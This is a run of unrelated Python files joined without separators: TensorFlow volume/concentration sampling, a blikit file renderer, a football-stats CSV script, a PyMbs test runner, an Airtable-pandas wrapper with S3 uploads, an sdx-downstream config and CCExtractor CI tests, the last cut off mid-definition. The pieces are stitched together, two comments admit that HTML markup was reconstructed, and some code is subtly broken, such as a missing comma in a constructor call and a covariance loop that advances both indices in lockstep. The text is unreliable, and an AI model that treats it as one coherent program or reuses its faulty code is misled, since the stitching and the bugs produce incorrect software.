# NOTE: here we need to manually log it back ind_vols_fl_sampled = tf.log( ind_vols_fl_rv.sample(n_samples)) ind_concs_fl_sampled = np.log( ind_concs_fl_rv.sample(n_samples)) # drop ref, in case it is used under high performace context del ind_vols_fl del ind_concs_fl del ind_d_vols_fl del ind_d_concs_fl del ind_vols_fl_rv del ind_concs_fl_rv # reshape back # NOTE: although this is not deterministically stable, # it was validated to work # (n_samples, time, n_wells) ind_vols_sampled = tf.reshape( ind_vols_fl_sampled, (n_samples, time, n_wells)) # (n_samples, time, 3, n_wells) ind_concs_sampled = tf.reshape( ind_concs_fl_sampled, (n_samples, time, 3, n_wells)) # ================ # calculating mean # ================ # the cumulative volume is the sum of all the volumes previously # build a lower triangular identity matrix # shape = (time, time) tril_ones = tf.tile( tf.expand_dims(tf.linalg.band_part(tf.eye(time), -1, 0), 0), [n_samples, 1, 1]) # calculate the cumulative volume, sampled # (n_samples, time, n_wells) vols_sampled = tf.matmul(tril_ones, ind_vols_sampled) # (time, n_wells) self.vols = tf.math.reduce_mean(vols_sampled, 0) # handle quantities # (n_samples, time, 3, n_wells) ind_qs = tf.multiply( tf.tile(tf.expand_dims(ind_vols_sampled, 2), [1, 1, 3, 1]), ind_concs_sampled) # we want to implement the following: # qs = tf.matmul(tril_ones, ind_qs) # but this is not supported by TensorFlow # (n_samples, time, 3, n_wells) qs = tf.Variable( tf.zeros([n_samples, time, 3, n_wells], dtype=tf.float32)) idx = tf.constant(0) def loop_body(idx): qs[:, :, idx, :].assign(tf.matmul(tril_ones, ind_qs[:, :, idx, :])) return idx + 1 tf.while_loop( lambda idx: tf.less(idx, tf.constant(3)), lambda idx: loop_body(idx), [idx]) # average to calculate the concentrations # (n_samples, time, 3, n_wells) concs_sampled = tf.div( qs, tf.tile(tf.expand_dims(vols_sampled, 2), [1, 1, 3, 1])) # (time, 3, n_wells) concs = tf.math.reduce_mean(concs_sampled, 0) # convert nan (0/0) to 0. concs = tf.where(tf.math.is_nan(concs), tf.zeros_like(concs), concs) self.concs = concs # ====================== # calculating covariance # ====================== # (time, time, n_wells) vols_cov = tf.Variable( tf.zeros((time, time, n_wells), dtype=tf.float32)) # initialize # NOTE: tf.while_loop is actually paralled idx = tf.constant(0) def loop_body(idx): vols_cov[:, :, idx].assign(cov(vols_sampled[:, :, idx])) return idx + 1 tf.while_loop( lambda idx: tf.less(idx, n_wells), lambda idx: loop_body(idx), [idx]) self.vols_cov = vols_cov # (time, time, 3, n_wells) concs_cov = tf.Variable( tf.zeros((time, time, 3, n_wells), dtype=tf.float32)) idx0 = tf.constant(0) idx1 = tf.constant(0) def loop_body(idx0, idx1): concs_cov[:, :, idx0, idx1].assign( cov(concs_sampled[:, :, idx0, idx1])) return idx0 + 1, idx1 + 1 tf.while_loop( lambda idx0, idx1: tf.logical_and( tf.less(idx0, 3), tf.less(idx1, n_wells)), lambda idx0, idx1 : loop_body(idx0, idx1), [idx0, idx1]) # convert nan (0/0) to 0. 
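# (These NaNs propagate from 0/0 concentration samples in wells that have not received any
#  volume yet; zeroing them keeps the covariance tensor finite.)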
concs_cov = tf.where(tf.math.is_nan(concs_cov), tf.zeros_like(concs_cov), concs_cov) self.concs_cov = concs_cov # vim: fileencoding=utf-8 import fnmatch import os import werkzeug from docutils import nodes from docutils.core import publish_parts from docutils.parsers.rst import Directive, directives from pygments import highlight from pygments.formatters import HtmlFormatter from pygments.lexers import LEXERS, guess_lexer_for_filename, TextLexer from blikit import utils from blikit.models import BlobObject from blikit.docutilsext import Writer class Document(object): title = None description = None body = None author_name = None last_modified = None created = None def __init__(self, **attrs): for name, value in attrs.iteritems(): if name.startswith('_'): continue setattr(self, name, value) renderer_map = [] def register_for(*pats): def _register_for(func): for p in pats: renderer_map.append((p, func)) return func return _register_for def render_blob(ctx, blob_obj): u'''render BlobObject as HTML portion using proper render function return if there is no render function for this object, return None ''' if blob_obj.commit.sha is None: # IndexObject # don't cache pass else: cache_key = 'render.render_blob:%s:%s' % \ (blob_obj.commit.sha, blob_obj.abs_name) cached = ctx.app.cache.get(cache_key) if cached is not None: return cached if not isinstance(blob_obj, BlobObject): # TODO: raise proper exception # XXX: may this function treat TreeObject? raise Exception for p, func in renderer_map: if fnmatch.fnmatch(blob_obj.name, p): result = func(ctx, blob_obj) break else: result = None if isinstance(result, Document): if result.author_name is None: result.author_name = blob_obj.author_name if result.last_modified is None: result.last_modified = blob_obj.last_modified if result.created is None: result.created = blob_obj.created if blob_obj.commit.sha is not None: ctx.app.cache.set(cache_key, result) return result @register_for('*.txt') def render_text(ctx, blob_obj): udata = blob_obj.data.decode('utf-8', 'replace') return Document(title=blob_obj.name, body=u'
' + werkzeug.escape(udata) + u'
') @register_for('*.rst') def render_rst(ctx, blob_obj): parts = publish_parts(blob_obj.data, writer=Writer(), settings_overrides={'initial_header_level': 2, 'syntax_highlight': 'short', 'ctx': ctx, 'obj': blob_obj}) parts['description'] = parts['title'] return Document(**parts) @register_for('*.png', '*.jpg', '*.jpeg', '*.gif') def render_images(ctx, blob_obj): w, h = utils.calc_thumb_size(blob_obj.data, (640, 480)) url = ctx.url_for('view_obj', rev=blob_obj.commit.name, path=blob_obj.root_path) raw_url = url + '?raw=1'
# NOTE: assumed markup -- the original inline HTML is missing here; this thumbnail link is a reconstruction matching the four format arguments
body = '<a href="%s"><img src="%s" width="%d" height="%d" /></a>' % (raw_url, raw_url, w, h) return Document(title=blob_obj.name, body=body) formatter = HtmlFormatter(noclasses=True, linenos=True) @register_for(*[p for l in LEXERS.values() for p in l[3]]) def render_sourcecode(ctx, blob_obj): try: data = blob_obj.data.decode('utf-8') except UnicodeDecodeError: data = blob_obj.data try: lexer = guess_lexer_for_filename(blob_obj.name, data) except ValueError: # no lexer found - use the text one instead of an exception lexer = TextLexer() return Document(title=blob_obj.name, description=lexer.name, body=highlight(data, lexer, formatter)) @register_for('*') def render_default(ctx, blob_obj): if '\x00' in blob_obj.data: # maybe binary file # display download link escaped = werkzeug.escape(blob_obj.name)
# NOTE: assumed markup -- the original anchor tag is missing; only the two format arguments survive
body = '<a href="%s?raw=1">download "%s"</a>' % (escaped, escaped) return Document(title=blob_obj.name, body=body) else: # maybe some text file # render like *.txt return render_text(ctx, blob_obj)
# berryscottr/cfb-rankings-superleague-edition
import csv import ast import json import pandas as pd for year in range(2010,2021): for week in range (1, 17): new_stats_file = [] outframe = pd.DataFrame() try: with open('src/data/team_stats/{}_week_{}_team_stats.csv'.format(year, week), newline='') as csvfile: reader = csv.reader(csvfile) counter = 0 for row in reader: counter += 1 if counter == 1: new_stats_file.append(['game_id','team','category','stat']) continue stats_row = row[1] json_stats_row = ast.literal_eval(stats_row) for cat in json_stats_row[0]['stats']: new_stats_file.append([row[0], json_stats_row[0]['school'], cat['category'], cat['stat']]) for cat in json_stats_row[1]['stats']: new_stats_file.append([row[0], json_stats_row[1]['school'], cat['category'], cat['stat']]) except FileNotFoundError: print('File not found') with open('src/data/team_stats/{}_week_{}_team_stats_fixed.csv'.format(year, week),'w+', newline='') as outfile: writer = csv.writer(outfile) if(len(new_stats_file) == 0): continue writer.writerows(new_stats_file)
# -*- coding: utf-8 -*- ''' This file is part of PyMbs. PyMbs is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. PyMbs is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with PyMbs. If not, see . 
Copyright 2011, 2012 , , , ''' # call testExamples.py without filename: test all automatically, suppress gui # call testExamples.py with filename: check specific example with visualization # # save dictionary to file import sys import glob import json from PyMbs.Input import MbsSystem try: from colorama import Fore except ImportError: without_colorama = True else: without_colorama = False try: with open('testResults.json', 'r') as f: results = json.loads(f.read()) except IOError: print('No previous test results found; will generate new file') results = {} except ValueError: print('Previous results could not be read; will generate new file') results = {} files = glob.glob('*.py') # Files in directory that aren't examples files.remove('test.py') files.remove('testExamples.py') files.remove('profile.py') files.remove('__init__.py') # called without filename if len(sys.argv) == 1: # Mock GUI call, to iterate over all examples without the need to close # each window MbsSystem.show = lambda *args, **kwargs: True passed = 0 for filename in files: if without_colorama: print(filename) else: print(Fore.GREEN + filename + Fore.RESET) try: exec(compile(open(filename).read(), filename, 'exec')) except: print(sys.exc_info()[0]) # if result key for file exists, don't overwrite second entry if results.get(filename) == None: results[filename] = ["FAILED", "NOT VALIDATED"] else: results[filename][0] = "FAILED" else: passed += 1 if results.get(filename) == None: results[filename] = ["PASSED", "NOT VALIDATED"] else: results[filename][0] = "PASSED" print(str((passed/len(files))*100) + "% have passed.") with open('testResults.json', 'w') as f: f.write(json.dumps(results, indent=1)) # called with filename elif len(sys.argv) == 2: filename = sys.argv[1] exec(compile(open(filename).read(), filename, 'exec')) status = eval(input("Did the example run succesfully (1) or not (2)?")) if status == 1: results[filename] = ["PASSED", "WORKS"] elif status == 2: results[filename] = ["PASSED", "DOESN'T WORK"] else: print("Incorrect input") with open('testResults.json', 'w') as f: f.write(json.dumps(results, indent=1)) else: print("Incorrect command line arguments") from .airtable import Airtable import pandas as pd import os import numpy as np import boto3 import traceback import tempfile import datetime global context_table context_table = None class PandasAirtable(Airtable): '''Extends Airtable class from python-airtable-wrapper. Automatically authenticates API access. Includes methods to download tables to pandas DataFrame and to upload attachments to Airtable via S3. For details on parent: https://github.com/gtalarico/airtable-python-wrapper ''' def __init__(self, primary_key=None, *args, **kwargs): self._primary_key = primary_key self._df = None super().__init__(*args, **kwargs) @property def df(self): if self._df is None: self._df = self.to_df() return self._df @df.setter def df(self, df): self._df = df @property def primary_key(self): if self._primary_key is None: self._primary_key = self.df.columns[0] return self._primary_key def to_df(self): '''Returns pandas DataFrame of current table. Note that this is slow- takes several seconds for a table with 1000 records. ''' records = self.get_all() df = airtable_records_to_DataFrame(records) return df def get_all_flat(self): '''Same function as .get_all() but returns a list of flat dictionaries; i.e. 
the Airtable id is merged with the fields dictionary ''' flatrecs = list(self.to_df().reset_index().to_dict(orient='index').values()) return flatrecs def create_s3_client(self): '''Creates an s3 client. Relies on configured AWS cli i.e. credentials must be present at '~/.aws/credentials' Might be wise to remove this to make this class more readily usable by people without AWS capabilities ''' self.s3 = boto3.client('s3', region_name='us-west-1') def get_record_id(self, field_name, field_value): recs = self.search(field_name=field_name, field_value=field_value) if len(recs) == 1: return recs[0]['id'] elif len(recs) == 0: print('No matching records') elif len(recs) > 1: print('More than one matching record') def get(self, record_id, as_series=True): if as_series: series = airtable_record_to_Series(Airtable.get(self, record_id=record_id)) series.af.table = self return series else: return Airtable.get(self,record_id=record_id) def get_many(self, record_ids, as_df=True): records = [Airtable.get(self, record_id=record_id) for record_id in record_ids] if as_df: df = airtable_records_to_DataFrame(records) df.af.table = self return df else: return records def __enter__(self): global context_table context_table = self return self def __exit__(self, exc_type, exc_value, tb): global context_table context_table = None if exc_type is not None: traceback.print_exception(exc_type, exc_value, tb) # return False # uncomment to pass exception through return True def upsert(self, record_id, fields, typecast=True): try: assert record_id is not None return self.update(record_id=record_id, fields=fields, typecast=typecast) except: return self.insert(fields=fields, typecast=typecast) def robust_upsert(self, record_id, fields, typecast=True): try: assert record_id is not None return self.robust_update(record_id=record_id, fields=fields, typecast=typecast) except: return self.robust_insert(fields=fields, typecast=typecast) def robust_insert(self, fields, typecast=True): try: fields = {k:typecast_airtable_value(v) for k,v in fields.items()} return self.insert(fields, typecast=typecast) except: return self.insert_one_field_at_a_time(fields=fields, typecast=typecast) def robust_update(self, record_id, fields,typecast=True): fields = {k:typecast_airtable_value(v) for k,v in fields.items()} try: return self.update( record_id=record_id, fields=fields, typecast=True, ) except: return self.update_one_field_at_a_time(record_id, fields, typecast=typecast) def insert_one_field_at_a_time(self, fields, typecast=True): record = None for key,val in fields.items(): try: record = self.insert(fields={key:val}, typecast=typecast) except: pass if record is not None: break record_id = record['id'] return self.update_one_field_at_a_time(record_id, fields, typecast=typecast) def update_one_field_at_a_time(self, record_id, fields, typecast=True): outputs = {'fails':[]} for key,val in fields.items(): try: field = {key: val} record = self.update( record_id=record_id, fields=field, typecast=typecast, ) outputs.update(record) except: outputs['fails'].append({'fields':field}) return outputs def upload_attachment_to_airtable_via_s3( self, filepath, s3_bucket, s3_key, record_id, field_name, s3_url_lifetime=300, delete_local_file_when_done=False, keep_old_attachments=True, s3_client=None, ): ''' Uploads a file to an attachment field for a single Airtable record. Works by uploading file first to S3, creating a short-lived public URL pointing to the file in S3, and then sending that URL to Airtable. 
Arguments: filepath -- local path of file to upload. String or Path object s3_bucket -- S3 bucket where file will be uploaded. String s3_key -- S3 key where file will be uploaded. String record_id -- Airtable record to update e.g. 'rec010N7Tt4tWxXTm'. String field_name -- Airtable attachment field for upload. String s3_url_lifetime -- Lifetime of public S3 url in seconds. Int delete_local_file_when_done -- if True, deletes local file after upload delete_s3_file_when_done -- if True, deletes S3 copy after upload. BROKEN ''' if s3_client is None: s3_client = create_s3_client() s3_client.upload_file( filepath, s3_bucket, s3_key) url = s3_client.generate_presigned_url( 'get_object', Params={ 'Bucket': s3_bucket, 'Key': s3_key }, ExpiresIn=s3_url_lifetime ) attachments = None if keep_old_attachments: rec = self.get(record_id=record_id, as_series=False)['fields'] attachments = rec.get(field_name) # returns None if nothing is in this field if attachments is None: attachments = [] attachments.append({'url': url}) fields = {field_name: attachments} # needs to be dict inside list self.update( record_id=record_id, fields=fields ) if delete_local_file_when_done: os.remove(filepath) @pd.api.extensions.register_series_accessor('af') class AirRow: def __init__( self, series, table:PandasAirtable=None, record_id:str=None, primary_key:str=None, ): self.series = series self._table = table self._record_id = record_id self._primary_key = primary_key def __repr__(self): s = self.series.__repr__() return f'AirRow ({self.table_name}) \n{s}' @property def table(self): if context_table is not None: return context_table else: return self._table @table.setter def table(self, table): self._table = table @property def fields(self): return self.series.convert_dtypes().to_dict() @property def table_name(self): try: return self.table.table_name except: return 'None' @property def record_id(self): '''If you manually set the record_id attribute, it will keep that one otherwise it will use the name of the series if it looks like a record_id lastly, it will query Airtable on its primary key ''' if self._record_id is None: if self._check_if_name_is_rec_id(): return self.series.name else: return self.get_record_id(field_name=self.primary_key) else: return self._record_id @record_id.setter def record_id(self, record_id): self._record_id = record_id def _check_if_name_is_rec_id(self): name = self.series.name if name is None: return False try: if len(name) != 17: # airtable record_id length return False except TypeError: return False if name[:3] == 'rec': # starts with rec return True else: return False def get_record_id(self, field_name, table=None): if table is None: table = self.table return table.get_record_id(field_name=field_name, field_value=self.series[field_name]) @property def primary_key(self): '''If you manually set a primary key for this instance, it will keep using that to track its record_id otherwise, it will look at the primary key of the associated PandasAirtable and use that ''' if self._primary_key is None: self._primary_key = self.table.primary_key return self._primary_key @primary_key.setter def primary_key(self, primary_key): self._primary_key = primary_key def insert( self, field_names=None, airtable=None, robust=True, typecast=True, ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} if robust: record = airtable.robust_insert(fields, typecast=typecast) else: record = 
airtable.robust_insert(fields, typecast=typecast) self.record_id = record['id'] return record def update( self, field_names=None, airtable=None, robust=True, typecast=True, ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} if robust: record = airtable.robust_update(record_id=self.record_id, fields=fields,typecast=typecast) else: record = airtable.update(record_id=self.record_id, fields=fields, typecast=typecast) try: self.record_id = record['id'] return record except: print('Update failed') def delete( self, airtable=None, ): if airtable is None: airtable = self.table assert airtable is not None return airtable.delete(record_id=self.record_id) def upsert( self, field_names=None, airtable=None, robust=True, typecast=True ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} try: record_id = self.record_id except: record_id = None if robust: record = airtable.robust_upsert(record_id=record_id, fields=fields, typecast=typecast) else: record = airtable.upsert(record_id=record_id, fields=fields, typecast=typecast) return record @pd.api.extensions.register_dataframe_accessor('af') class AirDataFrame: def __init__( self, df, table:PandasAirtable=None, primary_key:str=None, ): self._df = df self._table = table self._primary_key = primary_key @property def df(self): if self._df is None: self.get() return self._df @df.setter def df(self, df): self._df = df @property def table_name(self): try: return self.table.table_name except: return 'None' @property def table(self): if context_table is not None: return context_table else: return self._table @table.setter def table(self, table): self._table = table @property def primary_key(self): '''By default - check associated table first, then use first column (bc DataFrame columns are more likely to be rearranged) ''' if self._primary_key is None: try: self._primary_key = self.table.primary_key except: self._primary_key = self.df.columns[0] return self._primary_key @primary_key.setter def primary_key(self, primary_key): self._primary_key = primary_key def look(self): 'Pulls data from Airtable but does not change the parent DataFrame' return self.table.to_df() def get(self): 'Pulls data from Airtable and reconstructs parent DataFrame' self._df = self.table.to_df() return self._reconstruct() def get_row(self, index): row = self.df.iloc[index] row.af.table = self.table row.af.primary_key = self.primary_key return row def _reconstruct(self): _df = pd.DataFrame(self._df) _df.af.table = self.table _df.af.primary_key = self.primary_key return _df def _prep_df(self, primary_key=None, airtable=None, index=None, columns=None, ): if airtable is None: airtable = self.table assert airtable is not None if primary_key is None: primary_key = self.primary_key df = self.df if columns is not None: df = df.loc[:, columns] if index is not None: df = df.loc[index, :] return airtable, primary_key, df def update(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = 
row.af.update(typecast=typecast, robust=robust) records.append(_rec) return records def insert(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable row.af.primary_key = primary_key _rec = row.af.insert(typecast=typecast, robust=robust) records.append(_rec) return records def upsert(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = row.af.upsert(typecast=typecast, robust=robust) records.append(_rec) return records def delete(self, primary_key=None, airtable=None, index=None, columns=None ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = row.af.delete() records.append(_rec) return records def airtable_record_to_Series(record): return pd.Series(record['fields'], name=record['id']) def airtable_records_to_DataFrame(records): df = pd.DataFrame.from_records((r['fields'] for r in records), index=[ record['id'] for record in records]) df.index.name = 'record_id' return df def create_s3_client(region_name='us-west-1'): '''Creates an s3 client. Relies on configured AWS cli i.e. credentials must be present at '~/.aws/credentials' Might be wise to remove this to make this class more readily usable by people without AWS capabilities ''' return boto3.client('s3', region_name=region_name) def upload_attachment_to_airtable_via_s3( airtable, filepath, s3_key, record_id, field_name, s3_bucket=None, s3_url_lifetime=300, delete_local_file_when_done=False, delete_s3_file_when_done=False, keep_old_attachments=True, s3_client=None, ): ''' Uploads a file to an attachment field for a single Airtable record. Works by uploading file first to S3, creating a short-lived public URL pointing to the file in S3, and then sending that URL to Airtable. There's a potential security hazard here - the public URL is accessible to anyone who knows where to look for it during its short lifetime. It might be possible to restrict access to certain IPs if we can figure out what Airtable's IP address is. On the to-do list. Arguments: filepath -- local path of file to upload. String or Path object s3_bucket -- S3 bucket where file will be uploaded. String s3_key -- S3 key where file will be uploaded. String record_id -- Airtable record to update e.g. 'rec010N7Tt4tWxXTm'. String field_name -- Airtable attachment field for upload. String s3_url_lifetime -- Lifetime of public S3 url in seconds. Int delete_local_file_when_done -- if True, deletes local file after upload delete_s3_file_when_done -- if True, deletes S3 copy after upload. 
BROKEN ''' if s3_client is None: s3_client = create_s3_client() if not s3_bucket: s3_bucket = os.environ['TEMP_FILES_BUCKET'] s3_client.upload_file( filepath, s3_bucket, s3_key) url = s3_client.generate_presigned_url( 'get_object', Params={ 'Bucket': s3_bucket, 'Key': s3_key }, ExpiresIn=s3_url_lifetime ) attachments = None if keep_old_attachments: rec = airtable.get(record_id=record_id, as_series=False)['fields'] attachments = rec.get(field_name) # returns None if nothing is in this field if attachments == None: attachments = [] attachments.append({'url': url}) fields = {field_name: attachments} # needs to be dict inside list airtable.update( record_id=record_id, fields=fields ) if delete_local_file_when_done: os.remove(filepath) if delete_s3_file_when_done: # turning this on stops things from getting into airtable - # they appear quickly then are deleted. maybe it is too fast? s3_client.delete_object( Bucket=s3_bucket, Key=s3_key ) def typecast_airtable_value(value): if isinstance(value, list): return value elif isinstance(value, np.int64): return int(value) # elif value is None: # return '' elif pd.isna(value): return None else: return value def upload_df_to_airtable( airtable, df, primary_key='id', overwrite=False, try_one_field_at_a_time=False ): """upload pandas DataFrame to airtable Args: df (pandas DataFrame): should match format of airtable primary_key (str): primary key on airtable (first column). Defaults to 'id'. overwrite (bool): if yes, this runs an upsert. Defaults to False. try_one_field_at_a_time (bool, optional): can sometimes solve problems. Defaults to False. """ for i, row in df.iterrows(): upload_Series_to_airtable(airtable, row, primary_key, overwrite, try_one_field_at_a_time) def upload_Series_to_airtable( airtable, data: pd.Series, primary_key='id', overwrite=False, try_one_field_at_a_time=False, ): """upload pandas series to airtable Args: df_row (row of pandas Dataframe i.e. a Series): primary_key (str): primary key on airtable (first column). Defaults to 'id'. overwrite (bool): if yes, this runs an upsert. Defaults to False. try_one_field_at_a_time (bool, optional): can sometimes solve problems. Defaults to False. 
""" fields = data.to_dict() clean_fields = {} for key, value in fields.items(): # airtable doesnt like numpy ints clean_fields[key] = typecast_airtable_value(value) fields = clean_fields matching_recs = airtable.search( field_name=primary_key, field_value=fields[primary_key]) failed_to_upload = False if matching_recs: if len(matching_recs) > 1: print('WARNING: POSSIBLE DUPLICATE RECORDS IN AIRTABLE') if not overwrite: print(''' Warning: this experiment is already present in self Set overwrite=True if you want to overwrite ''') elif overwrite: try: record_id = matching_recs[0]['id'] airtable.update( record_id=record_id, fields=fields, typecast=True, ) except: failed_to_upload = True print('Upload to Airtable failed') if failed_to_upload & try_one_field_at_a_time: print('Trying to upload one field at a time') for key, value in fields.items(): try: record_id = matching_recs[0]['id'] airtable.update( record_id=record_id, fields={key: value}, typecast=True, ) except: print('Unable to upload ' + key) elif not matching_recs: try: airtable.insert( fields=fields, typecast=True, ) except: print('Upload to Airtable failed') if try_one_field_at_a_time: print('Trying to upload one field at a time') airtable.insert( fields={primary_key:fields[primary_key]}, typecast=True, ) matching_rec = airtable.match( field_name=primary_key, field_value=fields[primary_key]) record_id = matching_rec['id'] for key, value in fields.items(): try: airtable.update( record_id=record_id, fields={key: value}, typecast=True, ) except: print('Unable to upload ' + key) def unpack_list_field(x, delimiter=','): if len(x) == 1: try: return x[0] except: return x else: try: return delimiter.join(x) except: return x class AirtableAttachment(object): def __init__( self, filepath=None, record: AirRow = None, field_name=None, **kwargs ): self._filepath = filepath self._field_name = field_name self._record = record @property def filepath(self): return self._filepath @property def record(self): return self._record @property def record_id(self): return self.record.record_id def upload_to_airtable( self, filepath=None, field_name=None, airtable=None, record_id=None, s3_key=None, s3_bucket=None, keep_old_attachments=True, ): if airtable is None: airtable = self.record.table if filepath is None: filepath = self.filepath if record_id is None: record_id = self.record_id if field_name is None: field_name = self._field_name if s3_key is None: now = datetime.datetime.now() nowstr = now.isoformat().replace(':','_').replace('.','_') s3_key = f'temp_imgs/{nowstr}.png' airtable.upload_attachment_to_airtable_via_s3( filepath=filepath, s3_key=s3_key, record_id=record_id, s3_bucket=s3_bucket, field_name=field_name, keep_old_attachments=keep_old_attachments, ) @classmethod def from_matplotlib_figure( cls, figure, format='png', dpi=300, bbox_inches='tight', savefig_kwargs=None, **kwargs): if savefig_kwargs is None: savefig_kwargs = {} with tempfile.NamedTemporaryFile() as tmp: figure.savefig(tmp, format=format, dpi=dpi, bbox_inches=bbox_inches, **savefig_kwargs) return cls(filepath=tmp.name **kwargs) class AuthenticatedPandasAirtable(PandasAirtable): def retrieve_secrets(self): return None # overwrite this def __init__( self, table_name, base_key=None, api_key=None, *args, **kwargs, ): '''subclass me with your own methods for getting secrets ''' self._cred = None if (base_key is None) or (api_key is None): self._cred = self.retrieve_secrets() self._cred.get_defaults() if base_key is None: base_key = os.environ[self._cred.base_key_name] if api_key is None: 
api_key = os.environ[self._cred.api_key_name] super().__init__(table_name=table_name, base_key=base_key, api_key=api_key, *args, **kwargs)
import logging import os from structlog import wrap_logger LOGGING_LEVEL = logging.getLevelName(os.getenv("LOGGING_LEVEL", "DEBUG")) LOGGING_FORMAT = "%(asctime)s.%(msecs)06dZ|%(levelname)s: sdx-downstream: %(message)s" logger = wrap_logger(logging.getLogger(__name__)) def _get_value(key, default_value=None): """Gets a value from an environment variable; uses the default if provided, otherwise raises a ValueError. """ value = os.getenv(key, default_value) if not value: logger.error(f"No value set for {key}") raise ValueError() return value RABBIT_URL = 'amqp://{user}:{password}@{hostname}:{port}/%2f'.format( hostname=_get_value('RABBITMQ_HOST', 'rabbit'), port=_get_value('RABBITMQ_PORT', 5672), user=_get_value('RABBITMQ_DEFAULT_USER', 'rabbit'), password=_get_value('RABBITMQ_DEFAULT_PASS', 'rabbit') ) RABBIT_URLS = [RABBIT_URL] RABBIT_QUEUE = 'sdx_downstream' RABBIT_EXCHANGE = 'message' RABBIT_QUARANTINE_QUEUE = os.getenv('RABBIT_QUARANTINE_QUEUE', 'sdx-downstream-quarantine') FTP_HOST = _get_value('FTP_HOST', 'pure-ftpd') FTP_USER = os.getenv('FTP_USER') FTP_PASS = os.getenv('FTP_PASS') FTP_FOLDER = '/' FTP_FEEDBACK_FOLDER = '/EDC_QFeedback' SDX_STORE_URL = _get_value("SDX_STORE_URL", "http://sdx-store:5000") SDX_TRANSFORM_CS_URL = _get_value("SDX_TRANSFORM_CS_URL", "http://sdx-transform-cs:5000") SDX_SEQUENCE_URL = _get_value("SDX_SEQUENCE_URL", "http://sdx-sequence:5000")
# tests/test_ci/TestControllers.py
from mock import mock from tests.base import BaseTestCase, MockRequests from mod_home.models import CCExtractorVersion, GeneralData from mod_test.models import Test, TestPlatform, TestType from mod_regression.models import RegressionTest from mod_customized.models import CustomizedTest from mod_ci.models import BlockedUsers from mod_auth.models import Role from werkzeug.datastructures import Headers from importlib import reload from flask import g class TestControllers(BaseTestCase): @mock.patch('github.GitHub') def test_comments_successfully_in_passed_pr_test(self, git_mock): import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import comment_pr, Status # Comment on test that passes all regression tests comment_pr(1, Status.SUCCESS, 1, 'linux') git_mock.assert_called_with(access_token=g.github['bot_token']) git_mock(access_token=g.github['bot_token']).repos.assert_called_with(g.github['repository_owner']) git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner']).assert_called_with(g.github['repository']) repository = git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner'])(g.github['repository']) repository.issues.assert_called_with(1) pull_request = repository.issues(1) pull_request.comments.assert_called_with() new_comment = pull_request.comments() args, kwargs = new_comment.post.call_args message = kwargs['body'] if "passed" not in message: assert False, "Message not Correct" @mock.patch('github.GitHub') def test_comments_successfuly_in_failed_pr_test(self, git_mock): import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import comment_pr, Status repository = git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner'])(g.github['repository']) pull_request = repository.issues(1) message = ('CCExtractor CI platform finished running the ' 'test files on linux. 
Below is a summary of the test results') pull_request.comments().get.return_value = [{'user': {'login': g.github['bot_name']}, 'id': 1, 'body': message}] # Comment on test that fails some/all regression tests comment_pr(2, Status.FAILURE, 1, 'linux') pull_request = repository.issues(1) pull_request.comments.assert_called_with(1) new_comment = pull_request.comments(1) args, kwargs = new_comment.post.call_args message = kwargs['body'] reg_tests = RegressionTest.query.all() flag = False for reg_test in reg_tests: if reg_test.command not in message: flag = True if flag: assert False, "Message not Correct" def test_check_main_repo_returns_in_false_url(self): from mod_ci.controllers import check_main_repo assert check_main_repo('random_user/random_repo') is False assert check_main_repo('test_owner/test_repo') is True @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def test_customize_tests_run_on_fork_if_no_remote(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt # mocking the libvirt kvm to shut down vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] # Setting current snapshot of libvirt vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.create_remote() from collections import namedtuple GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] cron() fork_url = ('https://github.com/{user}/{repo}.git').format( user=self.user.name, repo=g.github['repository']) repo.create_remote.assert_called_with('fork_2', url=fork_url) repo.create_head.assert_called_with('CI_Branch', origin.refs.master) @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def 